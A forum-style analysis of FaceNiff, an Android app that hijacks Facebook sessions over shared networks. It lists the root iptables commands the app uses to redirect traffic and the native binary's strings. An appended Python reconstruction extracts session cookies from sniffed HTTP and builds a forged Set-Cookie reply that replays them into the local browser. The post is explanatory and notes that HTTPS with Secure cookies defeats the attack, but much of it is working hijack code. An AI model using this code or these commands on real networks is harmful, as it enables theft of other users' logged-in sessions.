I was curious about the technique used under the hood, so I decided to have a closer look.

-- What it does to intercept network traffic:

1/ The app spawns an Android (Java) service that performs the following as root when it starts:

    # echo 1 > /proc/sys/net/ipv4/ip_forward
    # iptables -t nat -I POSTROUTING -s 0/0 -j MASQUERADE
    # iptables -t nat -I OUTPUT -j DNAT -p tcp --dport 1337 --to 127.0.0.1
    # iptables -t nat -I PREROUTING -j DNAT -p tcp --dport 1337 --to xxxunclearherexxx

My understanding is that it redirects outgoing packets (targeted at port 1337) to loopback, where the native daemon listens (2/). This is not visible in the video, but when the user clicks to use a caught Facebook profile, it seems to trigger an Android Intent to actually go to Facebook on port 1337 instead of 80, so it gets caught by the iptables hook.

2/ It then execs the faceniff binary to go native (unpacked from resources) with some params (stealth/passive mode, license check), and polls its status every 1s.

-- Native part:

I believe it handles most of the logic. Looking at the strings contained, it seems to deal with libpcap to intercept and forge headers on the fly. Some interesting strings:

    libpcap version 0.9.8
    new user found but the app is locked!
    Unable to find ssid in cookies [%s]
    HTTP/1.1 200 OK
    Content-Type: text/html
    Connection: close
    Set-Cookie: %s=%s; expires=Fri, 14-Jul-2017 04:40:00 GMT; path=/; domain=.%s
    <meta http-equiv='refresh' content='0;http://%s/>
    HTTP/1.1 200 OK
    Content-Type: text/html
    Connection: close
    Date: Wed, 02 Feb 2011 01:51:18 GMT
    <li><a href='http://%s:1337/%s>%s</a></li>
    client asking for: [%s]

Technically speaking, this is interesting. Please feel free to add info if you are familiar with the technique.
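An added illustration of the cookie-replay flow that the format strings in the post suggest. This is example code written for this page, not FaceNiff's code and not taken from the app: it is a plausible reconstruction of the two halves of the trick, the sniffer side that pulls a session cookie out of a captured plaintext HTTP request, and the listener side that answers the browser's connection to http://site:1337/ (delivered to 127.0.0.1 by the DNAT rule) with a Set-Cookie for the real site's domain followed by a meta refresh to port 80. The cookie name "ssid", the sample request, the hostnames and the helper names are all assumptions made for the demo.

```python
"""
Added example (not FaceNiff's code): a reconstruction, from the format
strings quoted above, of how a sniffed session cookie could be replayed
into the local browser.  Every name, hostname and sample packet here is
constructed for the demo.
"""
from typing import Dict, Optional, Sequence, Tuple

# Assumption: the app's "ssid" string names a session cookie; real sites use
# their own names, so the caller supplies the list to look for.
DEFAULT_SESSION_COOKIES: Sequence[str] = ("ssid",)


def parse_http_request(raw: bytes) -> Optional[Tuple[str, str, Dict[str, str]]]:
    """Split the request line and headers of a plaintext HTTP/1.x request.

    Returns None for anything that is not a well-formed request head; a
    libpcap sniffer sees every TCP payload and most of them are not HTTP.
    """
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            return None
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()  # names are case-insensitive
    return parts[0], parts[1], headers


def parse_cookie_header(value: str) -> Dict[str, str]:
    """Parse 'a=1; b=2' into a dict; a repeated name overwrites the earlier one."""
    cookies: Dict[str, str] = {}
    for pair in value.split(";"):
        pair = pair.strip()
        if "=" in pair:
            name, val = pair.split("=", 1)
            cookies[name.strip()] = val.strip()
    return cookies


def extract_session(raw: bytes,
                    session_names: Sequence[str] = DEFAULT_SESSION_COOKIES
                    ) -> Optional[Dict[str, str]]:
    """Sniffer side: {host, name, value} if the request carries a session cookie.

    None corresponds to the app's "Unable to find ssid in cookies" case.
    """
    req = parse_http_request(raw)
    if req is None:
        return None
    _method, _target, headers = req
    host = headers.get("host")
    cookie = headers.get("cookie")
    if not host or not cookie:
        return None
    cookies = parse_cookie_header(cookie)
    for name in session_names:
        if name in cookies:
            return {"host": host, "name": name, "value": cookies[name]}
    return None


def cookie_domain(host: str) -> str:
    """Drop the port and a leading 'www.' so the cookie covers the whole site.

    Assumption: this is what fills the 'domain=.%s' placeholder.
    """
    name = host.split(":", 1)[0].lower()
    return name[4:] if name.startswith("www.") else name


def hijack_response(session: Dict[str, str],
                    expires: str = "Fri, 14-Jul-2017 04:40:00 GMT") -> bytes:
    """Listener side: the reply sent to the local browser on 127.0.0.1:1337.

    The browser opened http://<host>:1337/, so it attributes the Set-Cookie
    to <host>; the meta refresh then loads the real site on port 80 and the
    browser attaches the stolen cookie to that request.
    """
    host = session["host"]
    body = f"<meta http-equiv='refresh' content='0;http://{host}/'>"
    head = "\r\n".join([
        "HTTP/1.1 200 OK",
        "Content-Type: text/html",
        "Connection: close",
        f"Content-Length: {len(body)}",
        f"Set-Cookie: {session['name']}={session['value']}; "
        f"expires={expires}; path=/; domain=.{cookie_domain(host)}",
        "",
        "",
    ])
    return head.encode("latin-1") + body.encode("latin-1")


def profile_link(host: str, session_id: str, label: str) -> str:
    """One entry of the captured-profile list (the '<li><a href=...:1337/%s>' string)."""
    return f"<li><a href='http://{host}:1337/{session_id}'>{label}</a></li>"


# Constructed sample capture: a plaintext request carrying a session cookie.
SAMPLE_REQUEST = (
    b"GET /home.php HTTP/1.1\r\n"
    b"Host: www.facebook.com\r\n"
    b"User-Agent: Mozilla/5.0 (Linux; Android 2.3)\r\n"
    b"Cookie: locale=en_US; ssid=d34db33f; theme=light\r\n"
    b"\r\n"
)
# Constructed sample: same site, logged-out visitor, nothing to steal.
SAMPLE_NO_SESSION = b"GET / HTTP/1.1\r\nHost: www.facebook.com\r\nCookie: locale=en_US\r\n\r\n"

if __name__ == "__main__":
    sess = extract_session(SAMPLE_REQUEST)
    print("captured:", sess)
    print(hijack_response(sess).decode("latin-1"))
    print("no session:", extract_session(SAMPLE_NO_SESSION))
```

The point this makes visible is why the Intent goes to port 1337 on the real hostname rather than to 127.0.0.1: cookie scope is by domain, not by port, so a reply that the browser believes came from www.facebook.com:1337 can set a cookie for .facebook.com, and the refresh to port 80 then carries it. The whole chain only works while the session cookie travels in plaintext; a site that keeps the session on HTTPS with the cookie marked Secure gives the sniffer nothing to extract in the first step.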